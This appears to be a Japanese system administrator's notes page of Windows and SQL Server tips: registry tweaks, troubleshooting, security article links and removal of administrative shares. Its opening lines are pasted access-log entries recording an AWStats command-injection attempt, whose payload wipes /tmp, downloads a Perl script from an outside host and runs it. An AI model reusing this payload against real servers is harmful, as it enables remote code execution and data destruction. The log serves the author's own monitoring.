configdir=|echo%20;cd%20/tmp;rm%20-rf%20*;killall%20-9%20perl;wget%20members.lycos.co.uk/sugi/a.txt;perl%20a.txt;echo%20;rm%20-rf%20a.txt*;echo| 80 - 219.166.34.48 Mozilla/4.0+(compatible;+MSIE+6.0;+Windows+98) - - 401 2 64 2005-11-05 01:39:20 61.194.16.4 GET /stats/awstats/awstats.pl configdir=|echo%20;cd%20/tmp;rm%20-rf%20*;killall%20-9%20perl;wget%20members.lycos.co.uk/sugi/a.txt;perl%20a.txt;echo%20;rm%20-rf%20a.txt*;echo| 80 - 219.166.34.48 Mozilla/4.0+(compatible;+MSIE+6.0;+Windows+98) - - 401 2 64 2005-11-05 01:39:20 61.194.16.4 GET /stats/cgi-bin/awstats.pl configdir=|echo%20;cd%20/tmp;rm%20-rf%20*;killall%20-9%20perl;wget%20members.lycos.co.uk/sugi/a.txt;perl%20a.txt;echo%20;rm%20-rf%20a.txt*;echo| 80 - 219.166.34.48 Mozilla/4.0+(compatible;+MSIE+6.0;+Windows+98) - - 401 2 64 ボットは一点突破の“スピア型ウイルス”、ISPも対応に苦慮 http://internet.watch.impress.co.jp/cda/event/2005/12/09/10168.html 対策のしおり - ウイルス対策、ボット対策、スパイウェア対策 - http://www.ipa.go.jp/security/antivirus/shiori.html スパイウエアで金銭的被害に遭ったらどうすればよい / デジタルARENA http://arena.nikkeibp.co.jp/qa/20051222/114843/ ルートキットの正体を暴く(前編) http://itpro.nikkeibp.co.jp/article/Windows/20060117/227369/  ルートキットの正体を暴く(後編)  http://itpro.nikkeibp.co.jp/article/Windows/20060117/227370/ -------------------------------------------------------------------- アクセスログで YAHOO のリファラ見たら NOD32 でトロイ検出されたんですけど… ↓これ。ウイルスは IRC/Wlah.A トロイ(2005.12.12 20:20) http://search.yahoo.co.jp/search?p=SQL%E6%96%87+CONVERT&src=top&search_x=19&search_y=14&ei=UTF-8&pstart=1&fr=top&b=11 UTF-7エンコードされたタグ文字列によるXSS脆弱性に注意 http://slashdot.jp/security/article.pl?sid=05/12/21/2318216 YAHOO の検索結果がこんな動きする場合が在ったような…… -------------------------------------------------------------------- 余ったCPUパワーでお小遣い稼ぎ?! フレッツユーザのPCをグリッドとして提供へ http://www.rbbtoday.com/news/20051221/27938.html ほほぅ… -------------------------------------------------------------------- メタデータにご用心 Windows Vistaのメタデータにご用心 http://www.itmedia.co.jp/news/articles/0512/26/news026.html Office 系  米ソフトメーカー、MS Officeメタデータの危険性を警告  http://japan.cnet.com/news/ent/story/0,2000047623,20070887,00.htm  消し忘れに注意?--MS Wordの機能からアシの付いたSCOの「幻の訴訟」  http://japan.cnet.com/news/ent/story/0,2000047623,20064698,00.htm  [WD97] Microsoft Word 文書のメタデータを最小限に抑える方法  http://support.microsoft.com/default.aspx?scid=kb;ja;JP223790  [HOWTO] Microsoft Word 2000 文書のメタデータを最小限にする方法  http://support.microsoft.com/default.aspx?scid=kb;JA;237361  PowerPoint 2003 プレゼンテーションのメタデータを最小限に抑える方法  http://support.microsoft.com/default.aspx?scid=kb;ja;826825  Word、Excel、PowerPoint が作る文書ファイルに保存される「メタデータ」を削除するツール   834427 - [OFF2003] Office 2003 および Office XP 用 Remove Hidden Data アドイン   http://support.microsoft.com/default.aspx?scid=kb;ja;834427   この削除ツールで消す事の出来るデータ   ・以前の作成者と編集者   ・ユーザー名   ・個人の詳細情報   ・削除された文字列   ・非表示の行または列   ・ファイルのパス   ・外部データソースへのリンク   ・回覧先 まだ続いている“不十分な黒塗りデータ”からの情報漏えい http://itpro.nikkeibp.co.jp/article/COLUMN/20080909/314475/
Hosting マイクロソフト、Hosting Partner Program の開始を発表 http://www.microsoft.com/japan/presspass/detail.aspx?newsid=2520 Visual Studio 2005 対応のレンタルサーバーサービスを来春より順次提供 http://www.microsoft.com/japan/presspass/detail.aspx?newsid=2496
Windows 98 以前でフォーマットしている FD を XP で認識させる方法 FD のブートセクタにメディアタイプを識別する為の識別子が付いてないだけで この識別子を付けてあげる事により認識するようになります。 具体的には、ブートセクタ内の「BIOSパラメータブロック(BPB)」と呼ばれる領域の オフセット21(15h)に値をセットします。 MS-DOS、Windows 3.1/95 の フォーマットコマンドはこの値をセットしません。 0x015 F0 2.88 MB 3.5 インチ、両面、36 セクタ F0 1.44 MB 3.5 インチ、両面、18 セクタ F9 720 KB 3.5 インチ、両面、9 セクタ F9 1.2 MB 5.25 インチ、両面、15 セクタ FD 360 KB 5.25 インチ、両面、9 セクタ FF 360 KB 5.25 インチ、両面、8 セクタ FC 180 KB 5.25 インチ、片面、9 セクタ FE 160 KB 5.25 インチ、片面、8 セクタ FE 250 KB 8 インチ、片面、単密度 FD 500 KB 8 インチ、両面、単密度 FE 1.2 MB 8 インチ、両面、倍密度 F8 ----- ハード ディスク ※ 下手に書き換えると FD が破壊されますのでご注意を。 バイナリエディタ( Dskprobe.exe )はサポートツール(Windows XP の CD) の中に入っています。 (インストール時に標準を選択すると、インストールされませんので完全を選択して下さい) バイナリエディタはフリーの Stirling.exe 等を利用すると良いかも。(調べてないので FD にアクセスできるか不明) http://www.vector.co.jp/vpack/filearea/win95/util/bin/edit/index.html 参考  Windows でフロッピー ディスクへのアクセス、フォーマット、または認識ができない  http://support.microsoft.com/?scid=kb;ja;140060&spid=1139&sid=312  MS-DOSで作成したファイル、フォルダ名にDBCS小文字がある場合アクセス不可  http://support.microsoft.com/kb/288132/ja  ファイル名拡張子に関する懸念と対策について (前編)  http://www.microsoft.com/japan/technet/security/secnews/columns/column060125.mspx
年末なので PCもお掃除 ウイルスチェック ・アンチウイルスはお好きなのを。  NOD32 とか カスペルスキーとか。  新エンジンで動作速度や検出力向上を図った「NOD32 アンチウイルス」  http://internet.watch.impress.co.jp/cda/news/2008/05/20/19619.html  常駐させてもめちゃくちゃ軽快に動作する総合セキュリティソフト「イーセット スマート セキュリティ」  http://gigazine.net/index.php?/news/comments/20080519_eset_smart_security/  「NOD32」と「ESET Smart Security」比較使用体験記 (1)  https://www.netsecurity.ne.jp/3_11171.html  「NOD32」と「ESET Smart Security」比較使用体験記 (2)  https://www.netsecurity.ne.jp/3_11198.html 「AVG Anti-Virus Free Edition 8 日本語版」無料配布開始  http://journal.mycom.co.jp/news/2008/04/25/012/index.html  アンチウイルスに除外させるファイル(低スペックマシンで有効)  http://support.microsoft.com/kb/822158/ja スパイウェア駆除  Spybot - Search & Destroy 1.4  http://www.altech-ads.com/product/10001045.htm   同じ物をキヤノンシステムソリューションズが販売している訳ですが……   http://canon-sol.jp/product/sb/index.html 不要なレジストリキーを削除  NTREGOPT  http://www.larshederer.homepage.t-online.de/erunt/index.htm  他にも便利なものが在るかも。 ディスクのクリーンアップ  ディスク クリーンアップがいつまで経っても終わらない場合   → 「古いファイルの圧縮」の場所を示すレジストリエントリが破損している      HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\VolumeCaches     値の名前 : Compress old files   をザクッと削除して、再度クリーンアップを実行。 最後にデフラグ。  デフラグも HD に負荷がかかりますのでやりすぎにはご注意。  XP/2003 は標準のデフラグをコマンドから実行可能ですので、タスクに登録して定期的に実行する事も出来ます。 詳しくは c:\>Defrag /? で確認。 ついでに ASR(自動システム回復:Automated System Recovery) でバックアップ。 ※ ただし FDドライブが無いと利用できません。  ディスクの最適化による最大限の Windows 2000 パフォーマンスの維持  http://www.microsoft.com/japan/technet/prodtechnol/windows2000serv/maintain/optimize/w2kexec.mspx  HDDは高温になっても大丈夫?  http://arena.nikkeibp.co.jp/qa/parts/20050727/112945/  ハードディスクそのもののデータは守れないか  http://www.nikkeibp.co.jp/sj/special/199/index.html  ハードディスク・ドライブの故障率に関する事実  http://itpro.nikkeibp.co.jp/article/COLUMN/20070529/272852/  断片化を爆速で処理する無料デフラグソフト「Auslogics Disk Defrag」  http://gigazine.net/index.php?/news/comments/20070619_auslogics_disk_defrag/  Fire File Copy  http://www.forest.impress.co.jp/lib/sys/file/syncbackup/firefilecopy.html  ディスク関連   Windows Server 2003 ベースのコンピュータでのダイナミック ディスクの使用に関する推奨事例   http://support.microsoft.com/kb/816307/ja   ベーシック と ダイナミック   http://www.atmarkit.co.jp/fwin2k/operation/diskmanagement/diskman01.html
SQL Enterprise manager からジョブの削除を行った際に  エラー 14274  MSXサーバーからのジョブ、ステップ、スケジュールの追加、更新、または削除は出来ません。 と出た場合の対策。  原因   SQL Server がインストールされているコンピュータ名を変更したばあいに発生します。 ジョブを削除するには、名前を元に戻すしか方法が無いようです。  [PRB] サーバーの名前を変更した後で SQL Server エージェント ジョブを更新するとエラー 14274 が発生する  http://support.microsoft.com/default.aspx?scid=kb;ja;281642 あと、コンピュータ名を変更後に sp_dropserver '旧コンピュータ名' go sp_addserver '新コンピュータ名','local' 又は 'remote' go この操作を行っても SQL Enterprise managerに登録されているコンピュータ名は自動的に変更されないそうなので SQL Enterprise Managerで変更後のコンピュータ名を追加し、変更前のコンピュータ名を削除する。  リモートコンピュータ又はローカルコンピュータ名はSQLServerではmaster.dbo.sysserversテーブルに格納されており  Windows Server のコンピュータ名を変更した場合には、このテーブルを更新する必要がある。  その為に sp_dropserver、sp_addserverプロシジャーを実行する必要がある。 Windows Vista または Windows Server 2008 の初期セットアップ中に 15 bytes を超えるコンピュータ名を入力すると、多くのサービスが開始されません。 http://support.microsoft.com/kb/969902  Windows はコンピュータ名を変更したり、長すぎたりすると  ろくな事になりませんのでご注意。
「入力した値は、列のデータ型またはデータ長と一致しないか、グリッド バッファの制限を越えています。」 と出た場合の対策。 ♠ ♣ ♥ ♦ © ® ↔ ↵ SQL Server へ上記 symbol フォントを char フィールドに保存しようとすると表示されるようです。 Unicode文字列型 だと保存できます。
イベントの種類: 警告 イベント ソース: Win32k イベント カテゴリ: なし イベント ID: 243 説明: デスクトップ ヒープの割り当てに失敗しました。 うむぅ… 無視して構わないのか、レジストリを操作するべきなのか… Microsoft Windows 2000 でデスクトップ ヒープがなくなるならば、新しいシステム ログ エントリが生成されていません。 http://support.microsoft.com/default.aspx?scid=kb%3Bja%3B810807 Windows Server 2003 または Windows 2000 を実行しているコンピュータから MPSReport へのエラー アプリケーションまたは DLL C:\Windows\System32\win32k.sysが有効な Windows イメージなのを表示することがあります。 http://support.microsoft.com/?scid=kb;ja;907300&spid=1131&sid=813
印刷がタイムアウトする場合の対策   HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\LPDSVC\Parameters   値の名前 : RecvTimeout   データの種類 : REG_DWORD   データの値 : 1 〜 1200 (秒)   デフォルトが 60秒 だから、 180秒とかにしてみる。 参考  Windows Server 2003 および Windows 2000 Server で大きな印刷ジョブが 60 秒でタイムアウトする  http://support.microsoft.com/kb/280344/ja  Windows 7 および Windows Server 2008 R2 のコア コンポーネントの印刷に関する更新プログラムのロールアップについて  http://support.microsoft.com/kb/2647753/ja  Windows Vista および Windows Server 2008 のプリント サーバーで、TCP 直接接続を使用した RPC 通信を無効化する方法 - Ask CORE - Site Home - TechNet Blogs  http://blogs.technet.com/b/askcorejp/archive/2011/07/29/disable-rpctcp-protocol-on-windows-vista-windows-server-2008-printer-server.aspx
Windows Server 2003 Resource Kit の中に linkspeed と言うツールがあるそうで このツールは、2つのホスト間の接続を計測できるようです。 リモートデスクトップや、Active Directory で認証が上手く行かない場合にリンク速度を測定してみましょって事で。 ローカルシステムからリモートシステムに対して、以下のコマンドを実行 > linkspeed /s \\サーバー名 > linkspeed /s サーバーの DNS 名 ドメインコントローラをテストする場合は > linkspeed /dc このツールはターゲットマシンも Windows 2003 である場合に最も効果を発揮。 Windows Deployment and Resource Kits http://www.microsoft.com/windows/reskits/ 参考  Windowsサーバークックブック― ネットワーク管理者のためのレシピ集 P53 より
Gマイル・ドットコム http://www.g-mile.com/ cgi エラー出たので報告したら以下の回答が… |平素はGマイル・ドットコムをご利用いただき、誠に |ありがとうございます。 | |さて、先般ご指摘いただきましたエラーメッセージにつきまして |次のとおりご回答申し上げます。 | |エラー表示は、ブラウザのポップアップブロック機能を |有効にしている場合に発生いたします。 |ご登録時、一時的にポップアップブロック機能を有効に |していただくと問題は発生しませんが、ポップアップ |ブロックが普及している現状下、同じ問題が発生しうる |可能性が高いと思われますので、近日中に改良をさせて |いただく所存でございます。 エラー時にパスとエラーの行が出てたから、出さない方が良いんじゃない? って書いたつもりだったんだけど。。。  Webアプリケーションに潜むセキュリティホール  第4回 エラーメッセージの危険性  http://www.atmarkit.co.jp/fsecurity/rensai/webhole04/webhole01.html
アクセスログ URL='/w00tw00t.at.ISC.SANS.DFind:)' だれかが、Web の脆弱性スキャナ使って調査してる、、、って事? http://isc.sans.org/diary.php?storyid=900
BIOS のファーム上げたらブルースクリーン… -------------------------------- イベントの種類: エラー イベント ソース: System Error イベント カテゴリ: (102) イベント ID: 1003 説明: エラー コード 000000fc、 パラメータ1 f78aea0c、 パラメータ2 1f276963, パラメータ3 f78ae978、 パラメータ4 00000000. -------------------------------- エラー コード 000000fc、 パラメータ1 f59c2954、 パラメータ2 1cccf963, パラメータ3 f59c28c0、 パラメータ4 00000000. -------------------------------- 戻しても、ブルースクリーン…orz 原因は BIOS の Execute Disable を有効にしたのが原因。  The factory default Setting is ON って書いてあって、OFF になってたらから設定したんだった・・・ バッファオーバーフロー対応してる CPU じゃなかったから、かな? ちなみに、DELL の SC420(安売りしてた時に手に入れた) オーバーレイに対応してなくて困ってた訳ですが…  実は、録画、録音がメインで( Web 公開はおまけみたいなもんだったり ) PCI Express x1 ビデオカード 商品・価格 一覧 http://www.coneco.net/list_spec/01507010/13343.html ELSA NVIDIA Quadro NVS 285 を注文中・・・(まだ発売されてなさげ) x64 ドライバも出るといいなぁ。
Microsoft Windows Server 2003 Scalable Networking Pack のリリース http://support.microsoft.com/kb/912222/ja Xeon 5100番台 のプロセッサとか、TCP/IP OffLoad Engine 搭載してるやつ向け。 デル、第9世代PowerEdgeサーバを出荷開始──新技術を積極採用 http://www.computerworld.jp/topics/Vtl/42441.html http://www1.jp.dell.com/content/topics/segtopic.aspx/pressoffice/2006/060620?c=jp&l=jp&s=corp この辺りのサーバを購入した場合は、上記の Networking Pack 導入で 劇的に反応が良くなるのではないでしょうか。。。 Some problems occur after installing Windows Server 2003 SP2 (KB945977) http://support.microsoft.com/kb/945977 SP2 をインストール後に色々不具合が出るようです。NIC のドライバを新しくせよ。
デスクトップに Windows のバージョンを表示させるには   HKEY_CURRENT_USER\Control Panel\Desktop   値の名前 : PaintDesktopVersion   データの種類 : REG_DWORD   データの値 : 1 参考  デスクトップにバージョンを表示する / デジタルARENA  http://arena.nikkeibp.co.jp/tec/winxp/20060713/117656/
Web のサムネイル化 クラフテック、画面キャプチャー用の「Capture It! ツールバー」を無償公開 http://internet.watch.impress.co.jp/cda/news/2006/11/20/13997.html PHARMACY http://members.jcom.home.ne.jp/illegal/homeWork/PHARMACY/  PHARMACY (Vector)  http://www.vector.co.jp/soft/winnt/net/se327655.html html2imgについて http://www2u.biglobe.ne.jp/~MAS/soft/html2img/index.html  スクロールが必要なWebページの全体像をキャプチャーできる「html2img」  http://www.forest.impress.co.jp/article/2002/07/22/html2img.html  html2img (Vector)  http://www.vector.co.jp/soft/win95/art/se248113.html FastStone Screen Capture - A tiny, versatile and flexible Screen Capture Tool http://www.faststone.org/FSCaptureDetail.htm  スクロールが必要な面積の広い画面を1枚絵に撮影できる「FastStone Capture」  http://www.forest.impress.co.jp/article/2006/10/02/fscapture.html 消費リソース零!『キャプラ』 http://homepage1.nifty.com/chappy/lib/libcawr.htm  画面キャプチャー直後の処理を指定できる「消費リソース零!『キャプラ』」  http://www.forest.impress.co.jp/article/2002/06/12/capwrite.html webnail2  http://fw.moongift.jp/intro/i-1023-catid-9.html  公式サイト  http://www.hirax.net/pukiwiki/pukiwiki.php?cmd=read&page=webnail2 url2bmp http://www.forest.impress.co.jp/article/2004/01/27/url2bmp.html  公式サイト http://www.pixel-technology.com/freeware/url2bmp/english/ URL2JPEG - オープンソースWEBページサムネールツール http://www.syboos.jp/html/bookmark/detail/20080416101800353.html  公式サイト  http://www.url2jpeg.com/ SimpleAPI http://simpleapi.net/ はてなスクリーンショット http://screenshot.hatena.ne.jp/ サーバー側でWEBサイトのスクリーンキャプチャ、サムネイルを作成する方法 http://jamz.jp/tech/2006/03/website-screen-capture-on-server.html http://jamz.jp/tech/2006/06/links-website-screen-capture.html Webプロフェッショナルの必須スキル 〜 一夜にしてWebページのキャプチャを極める完全ガイド http://dragon.jp/column/archives/miyanaga_060601.html 第1回 Google画像検索アプリを作ろう http://www.atmarkit.co.jp/fdotnet/practprog/wisearch01/wisearch01_01.html SimpleAPI での表示。 自作する場合は、このあたりかな。 Web ページデータのダウンロードについて http://www.microsoft.com/japan/msdn/vbasic/migration/tips/WebClient/ デスクトップの画像キャプチャ方法について http://www.microsoft.com/japan/msdn/vbasic/migration/tips/CopyFromScreen/ Internet ExplorerをFoxProでHOOKする http://www2u.biglobe.ne.jp/~objxbase/fontsetting/HookIEbyVFP.htm Webページをビットマップで取得する http://homepage1.nifty.com/yasunari/VB/VB2005/WebBrowserDrawToBitmap.htm Capture Entire Web Page http://www.codeproject.com/KB/vb/WebCapture.aspx 画面をキャプチャする http://dobon.net/vb/dotnet/graphics/screencapture.html
SOAP ネイティブ XML Web サービス要求をリッスンするためのサーバーの設定 http://msdn2.microsoft.com/ja-jp/library/ms191310.aspx ・エンドポイントの作成  CREATE ENDPOINT (Transact-SQL)  http://msdn2.microsoft.com/ja-jp/library/ms181591.aspx Http.sys の使用による URL 名前空間の予約 http://msdn2.microsoft.com/ja-jp/library/ms188682.aspx SQL Server 2005 HTTP エンドポイントを作成,権限設定サンプル http://blogs.sqlpassj.org/yoshihirokawabata/archive/2006/01/26/15909.aspx HTTP 名前空間の予約 http://msdn2.microsoft.com/ja-jp/library/ms190614.aspx ネイティブ XML Web サービス要求を送信する場合のサンプル アプリケーション http://msdn2.microsoft.com/ja-jp/library/ms189955.aspx HttpCfg.exe HTTP.SYS 名前空間予約などができるサポートツール http://blogs.sqlpassj.org/yoshihirokawabata/archive/2006/01/25/15902.aspx 一覧 httpcfg query urlacl 削除 httpcfg delete urlacl /u http://localhost:8080/ SSL に使用する証明書の構成 http://msdn2.microsoft.com/ja-jp/library/ms186362.aspx httpcfg query ssl WSDL の使用 http://msdn2.microsoft.com/ja-JP/library/ms175476.aspx PDS メソッドを呼び出すための SOAP の使用法 http://msdn.microsoft.com/library/ja/default.asp?url=/library/ja/jppjsdk/html/pdsUsingSOAP.asp Reporting Services のインストール方法に関するトピック http://msdn2.microsoft.com/ja-jp/library/ms143757.aspx クラシックASP で SOAP データを受け取るには、DOMDocument で XML を生成して、ServerXMLHTTP で POST する。 その時に、setOption でコードページの指定と、setrequestHeader で Content-Type を text/html SOAPAction に URL を含めて送信させる。受け取るデータは、responseXML で取得する。
管理共有を削除  作った覚えの無い共有が幾つか出来上がってる訳ですが、、、、  管理共有は共有名を知っているユーザか Administrator 権限がある人のみしかアクセス出来ません。  セキュリティ上問題になることは滅多に在りませんが Windows Server をインターネットに公開  している場合は管理共有を消しておきましょうね。ノートもかな。     C$ や D$ ルート パーティションやボリュームは、ドライブ文字に $ 記号を付加した名前で共有。   ADMIN$ コンピュータのリモート管理時に使用されるリソース   PRINT$ プリンタのリモート管理時に使用されるリソース   FAX$ FAX 通信時に FAX クライアントによって使用されるサーバー上の共有フォルダ   NETLOGON 隠し共有リソースではありませんが、特別な管理用共有   SYSVOL 隠し共有リソースではありませんが、特別な管理用共有   IPC$   プログラム間で通信を行うために必要な名前付きパイプを共有するリソース。削除できない。   HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\LanmanServer\Parameters   値の名前   : AutoShareServer(サーバー OS の場合)   値の名前   : AutoShareWks  (クライアントOS の場合)   データの種類 : REG_DWORD   データの値 : 0    上記キーを作成後、Server サービスの再起動    net stop server    net start server    ※ Windows 2008 Server の場合は Srv, Srv2 サービスも同時に再起動が必要です。    net stop srvnet    net stop srvnet < 2回停止コマンドを実行すること。    net start server  参考   Windows Server 2003 で管理用共有を削除する方法   http://support.microsoft.com/default.aspx?scid=kb;ja;816524   Windows Server 2003 でレジストリ エディタを使用して管理用共有を復元する方法   http://support.microsoft.com/default.aspx?scid=kb;ja;816113   クライアント コンピュータで隠し共有または管理用共有を作成および削除する方法   http://support.microsoft.com/default.aspx?scid=kb;ja;314984   When you modify the AutoShareServer registry value on a Windows Server 2008-based computer, you are prompted to restart the computer for the change to take effect   http://support.microsoft.com/kb/954413  フォルダ−アクセス権マップツール(無償)  http://www.microsoft.com/japan/windowsserver2003/activedirectory/ACL.mspx  役に立つかも。   ついでに、ファイルのコピーと移動でのアクセス権の違いにも注意。   コピー:コピー先フォルダの NTFS アクセス権が付与(別ドライブへ移動もこっち)   移動 :移動元フォルダの NTFS アクセス権が維持(同一ドライブの場合) (ある共有ディレクトリだけを、、、に書き足しても良かったかな。)
IE7 でタブが出てこない場合の復活方法。(未確認)   HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer   値の名前   : ClassicShell   データの種類 : REG_DWORD   データの値 : 0 ・IEの設定リセットを行ってみる ・Yahoo ツールバーを削除してみる  試してみたけど、タブ出てきませんねぇ…何が原因なんだろ。 The Desktop tab does not appear in the Display Properties dialog box in Windows XP http://support.microsoft.com/kb/922370   デスクトップのプロパティタブじゃん。 IE7 日本語版でましたね。http://www.microsoft.com/japan/windows/ie/default.mspx 結局入れ替えても、タブ表示されないわけで、、、 何が悪さしてるんだろう。  Internet Explorer 7 (IE7) 不具合情報(FAQ)  http://teamcroud.fc2web.com/ie7bate2.htm  Internet Explorer 7 (IE7) に関するトラブルや解決策など  http://bbs.hotfix.jp/ShowPost.aspx?PostID=6087  IE 7正式版を試す:ダウンロードしたばかりのIE 7日本語版をチェックしてみた  http://www.itmedia.co.jp/bizid/articles/0611/02/news121.html 何やってもダメな訳で…   えーと、新しいユーザを作成して、そのユーザでインストールしたらタブ出てきた。   が、以前のユーザでログインするとタブ出ず…最適化ツールとか、そのあたりが影響してそうだ。。。  Windows XP または Windows Server 2003 にすぐ開始するとき、 Internet Explorer 7 が終了します。  http://support.microsoft.com/kb/928427  Phishing フィルタ が Internet Explorer 7 に Web ページの内容を評価するので、非常に緩やかにコンピュータが応答することがあります。  http://support.microsoft.com/kb/928089  Windows XP SP2 ベースまたは Windows Vista-based のコンピュータで Internet Explorer 7 を使用すると、既定のシステム アイコンがインターネット ショートカット ファイルが表示されます。  http://support.microsoft.com/kb/930426  Internet Explorer 7 をアップグレードすると、 Outlook Express でハイパーリンクは機能しません。  http://support.microsoft.com/kb/929867  Internet Explorer 7 からファイル名に日本語を含むファイルをダウンロードすると、ファイル名の一部が変更されることがある  http://support.microsoft.com/kb/930938  Windows シェルから Internet Explorer 7 の分離  http://support.microsoft.com/kb/928675  Internet Explorer 7 がインストールされている場合に、Windows XP のインストールの修復を実行する方法  http://support.microsoft.com/kb/917964  問題が Internet Explorer で発生し、閉じます。  http://support.microsoft.com/kb/931324  Internet Explorer 7 の XML コンテンツを含む Web ページを更新すると、 Iexplore.exe プロセスでメモリ使用量が増加します。  http://support.microsoft.com/kb/929861  Internet Explorer 7 の Service Pack 2 で Windows XP を実行しているコンピュータでポップアップ ウィンドウを閉じるとき、アクセス違反が発生することがあります。  http://support.microsoft.com/kb/931678  Windows XP を実行しているコンピュータにファイルをダウンロードするために、 Windows Internet Explorer 7 を使用することができません。  http://support.microsoft.com/kb/932823   IME の入力が受け付けられなくなったり、終了時にエラー出たりしますねぇ... Webフォルダの動きもなんだか変だし...  Windows Vista を実行しているコンピュータにおいてネットワーク経由でファイルのコピーを実施すると 通信速度が遅いことがある  http://support.microsoft.com/kb/932170
レジストリを操作してカスタマイズ。上の件があったもんで(笑 「マイコンピュータ」表示名をログインユーザ名に変更   HKEY_CLASSES_ROOT\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}   値の名前   : LocalizedString   データの種類 : REG_EXPAND_SZ   データの値 : %USERNAME% (ユーザ名を表示する場合) %COMPUTERNAME% (コンピュータ名)         環境変数は、コマンドプロンプト から SET コマンドで確認出来ます。    セットアップCDの参照場所の変更「プログラムの追加と削除」   HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Setup   値の名前   : SourcePath   データの種類 : REG_SZ   データの値 : 参照先の保存先パス   デバイスドライバやネットワーク関連   HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion   値の名前   : SourcePath   データの種類 : REG_SZ   データの値 : 参照先の保存先パス アプリケーションの保存先を「Program Files」から変更   HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion   値の名前   : ProgramFilesDir   データの種類 : REG_SZ   データの値 : プログラムの保存先フォルダ   値の名前   : CommonFilesDir   データの種類 : REG_SZ   データの値 : プログラムの共有ファイルの保存先フォルダ マウスが重なったウインドを自動アクティブ化   HKEY_CURRENT_USER\Control Panel\Desktop   値の名前   : UserPreferencesMask   データの種類 : REG_BINARY   データの値 : FF,3E,00,00           FF:B0でアニメーション無効化           3E:マウスポインタの影有効 00 にすると無効化           00:?           00:?   値の名前   : ActiveWindowTracking   データの種類 : REG_DWORD   データの値 : 0(無効) 1(有効)   値の名前   : ActiveWndTrkTimeout   データの種類 : REG_DWORD   データの値 : アクティブになるまでの時間(ミリ秒) デスクトップを別プロセスで実行   HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer   値の名前   : DesktopProcess   データの種類 : REG_DWORD   データの値 : 0(デフォルト) 1(プロセス分離) http://arena.nikkeibp.co.jp/tec/winxp/20040406/108355/ エスクプローラを別プロセスで実行   HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer   値の名前   : SeparateProcess   データの種類 : REG_DWORD   データの値 : 0(デフォルト) 1(プロセス分離) http://www.atmarkit.co.jp/fsecurity/rensai/securitytips/040explorer.html ゴミ箱のプロパティを非表示   HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer   値の名前   : NoPropertiesRecycleBin   データの種類 : REG_DWORD   データの値 : 0(デフォルト) 1(非表示) 前回開いていたフォルダを表示 HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced   値の名前   : PersisBrowsers   データの種類 : REG_DWORD   データの値 : 0(無効) 1(有効) エクスプローラのツリーを自動展開   HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced   値の名前   : FriendlyTree   データの種類 : REG_DWORD   データの値 : 0(無効) 1(有効) ポップアップバルーン無効化   HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced   値の名前   : ShowInfoTip   データの種類 : REG_DWORD   データの値 : 1(デフォルト) 0(ヒント表示なし) 新たにインストールしたプログラムの通知を無効化   HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced   値の名前   : Start_NotifyNewApps   データの種類 : REG_DWORD   データの値 : 1(デフォルト) 0(通知なし) クリーンアップウィザード無効化   HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Desktop\CleanupWiz   値の名前   : NoRun   データの種類 : REG_DWORD   データの値 : 0(デフォルト) 1(無効化) クラシックスタイル   HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System   値の名前   : SetVisualStyle   データの種類 : REG_SZ   データの値 : 空にしておく。 スタートメニューからログオフ非表示   HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer   値の名前   : StartMenuLogoff   データの種類 : REG_DWORD   データの値 : 0(デフォルト) 1(非表示)    スタートメニューからシャットダウン非表示   HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer   値の名前   : NoClose   データの種類 : REG_DWORD   データの値 : 0(デフォルト) 1(非表示)    スタートメニューから「すべてのプログラム」を非表示   HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer   値の名前   : NoStartMenuMorePrograms   データの種類 : REG_DWORD   データの値 : 0(デフォルト) 1(非表示)    スタートメニューから「よく使われるプログラム一覧」を非表示   HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer   値の名前   : NoStartMenuMFUprogramsList   データの種類 : REG_DWORD   データの値 : 0(デフォルト) 1(非表示)    スタートメニューから「インターネット、電子メール」アイコンを非表示   HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer   値の名前   : NoStartMenuPinnedList   データの種類 : REG_DWORD   データの値 : 0(デフォルト) 1(非表示)    スタートメニューからログオン中のユーザ名を非表示   HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer   値の名前   : NoUserNameInStartMenu   データの種類 : REG_DWORD   データの値 : 0(デフォルト) 1(非表示)    エクスプローラでのファイルの並び順を変更   HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer   値の名前   : NoStrCmpLogical   データの種類 : REG_DWORD   データの値 : 0(デフォルト 数字順) 1(文字コード順)    タスクバ上のツールバー非表示   HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer   値の名前   : NoToolbarsOnTaskbar   データの種類 : REG_DWORD   データの値 : 0(デフォルト) 1(無効化)    タスクバーのコンテキストメニュー(マウスの右クリック)非表示   HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer   値の名前   : NoTrayContextMenu   データの種類 : REG_DWORD   データの値 : 0(デフォルト) 1(無効化)    コンテキストメニュー(マウスの右クリック)非表示   